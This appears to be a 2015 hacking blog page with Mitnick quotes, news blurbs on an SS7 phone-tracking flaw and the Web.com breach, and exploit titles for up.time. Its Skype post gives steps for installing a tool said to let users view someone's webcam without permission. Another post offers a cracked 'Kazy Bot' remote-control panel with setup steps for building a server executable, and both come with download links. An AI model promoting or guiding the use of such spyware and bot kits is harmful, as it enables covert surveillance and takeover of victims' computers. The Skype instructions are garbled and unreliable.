Just Educational Purpose Only For Pentesters And Developers

  • challenge

    I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. Kevin Mitnick

    Read More
  • Computer hacking

    Computer hacking really results in financial losses and hassles. The objectives of terrorist groups are more serious. That is not to say that cyber groups can't access a telephone switch in Manhattan on a day like 9/11, shut it down, and therefore cause more casualties.Kevin Mitnick

    Read More
  • The only Entertainment

    Hacking was the only entertainment that would occupy my mind - like a huge video game, but with real consequences. I could have evaded the FBI a lot longer if I had been able to control my passion for hacking.Kevin Mitnick

    Read More

Friday, August 21, 2015

Your GPS Location and Calls Can be Spied Using Network Vulnerability



Yes, you heard it right. It's the dirty truth that’s featuring what is being called the largest privacy breach ever.
Billions of cell phone users are at risk of a vulnerability in the SS7 inter-carrier network that allows hackers and spies agencies to track locations and intercept all voice calls from anywhere in the world.
This is something we already know from the last year's Snowden leaks that explained the National Security Agency (NSA) capabilities to gather nearly 5 Billion records a day on mobile phone locations around the world. 

Thursday, August 20, 2015

up.time 7.5.0 Upload And Execute File Exploit

up.time 7.5.0 Superadmin Privilege Escalation Exploit

Web.com Hacked! Credit Card information of 93,000 Customers Compromised


Web.com, a Florida-based web hosting company with up to 3.3 Million customers, has suffered a data breach and may have compromised personal information and credit card data belonging to 93,000 of its clients.
The company on Tuesday confirmed that some unknown hackers had breached one of its computer systems on August 13, 2015, and accessed personal information of nearly 93,000 customers.
Web.com, with the goal to help small businesses succeed online, uncovered the unauthorized activity as part of its ongoing security monitoring and shutdown process.
 

Monday, July 13, 2015

Skype WebCam Hack



Skype (play /'ska?p/) is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011.

Many ppl want to view web cam them partner boy/girl friend after skype release 5.1.x version Pakistani Hacker Created exploit which allow to ppl view Webcam without permission Software usage is easy 
1 -uninstall all skype which u have already installed 
2 - minimum 3 person on convertion call user must be all online in call (many ppl trying to make offline user call to test software not work bcz user need online
3 - skype all use must be on pc online on window or linux Some Os Also support this exploit remove installed dir form to C:Programm file Run Setup of Skype webcam hack and follow the video which exploit creater make  there is 2 file 1 is setup if after installing not workng then run Skype-x.exe file which ll patch skype registry 



Monday, May 25, 2015

Kazy Bot Full Version ( Cracked)(No Port Forward)


step 1 ) upload files from php folder to your hosting's public_html folder
step 2 ) create datebase with name kazybot
step 3 ) import database file to your kazybot database
step 4 ) connect your server from window client
step 5 ) build server.exe with your server address
==+==+==+==+==+==+>Enjoy Hacking<==+==+==+==+==+==+==+==


Download
click to begin
4.43MB .zip

Thursday, May 21, 2015

Hacking ASP.Net Website

The best attacking for asp.net web application hacker handbook.


Download

click to begin

1.3MB .pdf

The Webapplication Hackers HandBook

Chapter 1  Web Application (In)security 
Chapter 2  Core Defense Mechanisms
Chapter 3  Web Application Technologies 
Chapter 4  Mapping the Application 
Chapter 5  Bypassing Client-Side Controls 
Chapter 6  Attacking Authentication 
Chapter 7  Attacking Session Management 
Chapter 8  Attacking Access Controls 
Chapter 9  Attacking Data Stores 
Chapter 10  Attacking Back-End Components 
Chapter 11  Attacking Application Logic 
Chapter 12  Attacking Users: Cross-Site Scripting 
Chapter 13  Attacking Users: Other Techniques 
Chapter 14  Automating Customized Attacks 
Chapter 15  Exploiting Information Disclosure 
Chapter 16  Attacking Native Compiled Applications 
Chapter 17  Attacking Application Architecture 
Chapter 18  Attacking the Application Server 
Chapter 19  Finding Vulnerabilities in Source Code 
Chapter 20  A Web Application Hacker’s Toolkit 
Chapter 21  A Web Application Hacker’s Methodology 



Download

click to begin

13MB .pdf